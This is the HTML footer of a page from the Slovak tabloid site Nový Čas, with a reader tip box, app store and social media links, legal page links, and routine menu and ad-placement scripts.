<section class="small-footer">
    <div class="small-footer-left-wrapper">
        <div class="small-footer-tip-text">
            <div class="tip-text">Chcete sa s celým Slovenskom podeliť o pikantnú informáciu či kurióznu skúsenosť?
                Sme tu pre vás!
            </div>
            <a data-event="clanok|paticka|poslat-tip" class="transparent-button"
                href="/tipredakcii/" title="Poslať TIP na článok">
                Poslať TIP na článok
            </a>
        </div>
        <div class="small-footer-tip">
            <div class="tip">
                <div class="footer-title">
                    <div class="cas-color-font">Máte tip</div>
                    na článok?
                </div>
                <div class="logo">
                    <img src="https://cdn.cas.sk/cas/img/igon-tipodvas.png" title="Máte tip na článok? | Nový Čas"
                        alt="Máte tip na článok?">
                </div>
                <div class="cb"></div>
            </div>
        </div>
    </div>
    <div class="small-footer-right-wrapper">
        <div class="best-news-wrapper">
            <div class="cas-color-font">
                Najlepšie bulvárne spravodajstvo<br>
                <span class="text-white">do vášho zariadenia</span>
            </div>
        </div>
        <div class="novy-cas-apps ml20">
            <div class="text">
                Stiahnite si aplikáciu pre váš pc, notebook, tablet, iPad, android a prezerajte si naše noviny a
                časopisy kedykoľvek.
            </div>
            <div class="apps-icons">
                <a data-event="clanok|paticka|google-play" class="icon google-play-icon"
                    href="https://play.google.com/store/apps/details?id=sk.cas.android.app"
                    title="Stiahnite si aplikáciu z Google play | Nový Čas">
                    <img src="https://cdn.cas.sk/cas/img/svg/icon_googleplay.svg"
                        title="Stiahnite si aplikáciu z Google play | Nový Čas"
                        alt="Stiahnite si aplikáciu z Google play">
                </a>
                <a data-event="clanok|paticka|app-store" class="icon"
                    href="https://itunes.apple.com/sk/app/novy-cas.sk/id804072747?mt=8"
                    title="Stiahnite si aplikáciu z App Store | Nový Čas">
                    <img src="https://cdn.cas.sk/cas/img/svg/icon_appstore.svg" alt="Stiahnite si aplikáciu z App Store"
                        title="Stiahnite si aplikáciu z App Store | Nový Čas">
                </a>
            </div>
        </div>
    </div>
</section>
<section class="footer-bottom">

    <div class="socials">
        <a data-event="clanok|paticka|facebook" href="https://www.facebook.com/novycas"
            title="Nový Čas na facebooku">
            <img src="https://cdn.cas.sk/cas/img/svg/icon_fb.svg" title="Nový Čas na facebooku"
                alt="Nový Čas na facebooku">
            <span>Nový Čas na facebooku</span>
        </a>

        <a data-event="clanok|paticka|twitter" href="https://twitter.com/novycassk"
            title="Nový Čas na twitteri">
            <img src="https://cdn.cas.sk/cas/img/svg/icon_tweet.svg" title="Nový Čas na twitteri"
                alt="Nový Čas na twitteri">
            <span>Nový Čas na twitteri</span>
        </a>

        <a data-event="clanok|paticka|google-plus" href="https://www.instagram.com/novycas/"
            title="Nový Čas na instagrame">
            <img src="https://cdn.cas.sk/cas/img/svg/icon_instagram.svg" title="Nový Čas na instagrame"
                alt="Nový Čas na instagrame">
            <span>Nový Čas na instagrame</span>
        </a>
    </div>

    <div class="about">
        <span class="hidden lg-visible md-visible">
            <a data-event="clanok|paticka|redakcia" href="/redakcia/#redakcia"
                title="Redakcia">Redakcia</a>
            <span class="separator">|</span>
            <a data-event="clanok|paticka|inzercia" href="/redakcia/#inzercia"
                title="Inzercia">Inzercia</a>
            <span class="separator">|</span>
            <a data-event="clanok|paticka|marketing" href="/redakcia/#marketing"
                title="Marketing">Marketing</a>
            <span class="separator">|</span>
            <a data-event="clanok|paticka|rss" href="/rss/" title="Rss">Rss</a>
            <span class="separator">|</span>
            <a data-event="clanok|paticka|cookie" href="/clanok/728517/zasady/"
                title="Cookie">
                Cookie
            </a>
            <span class="separator">|</span>
            <a data-event="clanok|paticka|pravidla"
                href="/clanok/729650/vseobecne-podmienky-pre-servery-prevadzkovane-spolocnostou-novy-cas-a-s/"
                title="Pravidlá">
                Pravidlá
            </a>
            <span class="separator">|</span>
            <a data-event="clanok|paticka|gdpr" href="/clanok/731794/gdpr/"
                title="Gdpr">GDPR</a>
        </span>

        <div class="hidden sm-visible xs-visible about-menu">
            <div class="mobile-section-menu" id="5daff50c40887">
                <div class="mobile-section-menu-wrapper">
                    <select>
                        <option value="/kontakty#redakcia">Redakcia</option>
                        <option value="/kontakty#inzercia">Inzercia</option>
                        <option value="/kontakty#marketing">Marketing</option>
                        <option value="/rss/">Rss</option>
                        <option value="/clanok/728517/zasady/">Podmienky</option>
                    </select>
                    <span class="mobile-section-menu-button">O nás</span>
                </div>
            </div>

            <script>
                $(function () {
                    $('#5daff50c40887 select').change(function () {
                        var href = $(this).val();
                        if (href != '') {
                            location.href = href;
                        }
                    });
                });
            </script>
        </div>

        <span class="copyright">
            © FPD Media, a.s. Autorské práva sú vyhradené a vykonáva ich prevádzkovateľ portálu. Spravodajská
            licencia vyhradená.
        </span>
    </div>
</section>
		<!-- Footer end --><script type="text/javascript">
        $(() => {
            if (window.innerWidth < 1024) {
                let strossle = $(".rs-advertisement-strossle-widget").first();
                $(".article-bottom.xs-visible .row.bordered").prepend(strossle);
            }
        });
    </script><script>
$("#m_mid2").css("text-align", "center").css("width", "100%").css("padding","10px 0");
</script>
<style>
div#videoad {
    margin: 10px auto;
    text-align: center;
}
.side-section iframe[id*='google_ads_iframe'], .side-section iframe[id*='adf'] {margin: 20px 0 0 0 !important;}
</style><!-- //Connect Container: Cas.sk-->
<script src="//get.s-onetag.com/1af21222-9b7c-4723-ba13-3960cd2ff455/tag.min.js" async defer></script>			<script type="text/javascript">
				$(function () {
					if (typeof __cas.handleTiviPlayerResize !== 'undefined') {
						__cas.handleTiviPlayerResize();
					}
				});
			</script>

			<script type="text/javascript">
				$(function () {
					if (typeof __cas.handleEmbedResize !== 'undefined') {
						__cas.handleEmbedResize();
					}
				});
			</script>	</body>

</html>

<!-- ZCHECK OK 82ms www-cas-frontend-5 db-cas/db-cas-slave-1 -->
<!-- ZCHECK OK 82ms www-cas-frontend-5 db-cas/db-cas-slave-1 -->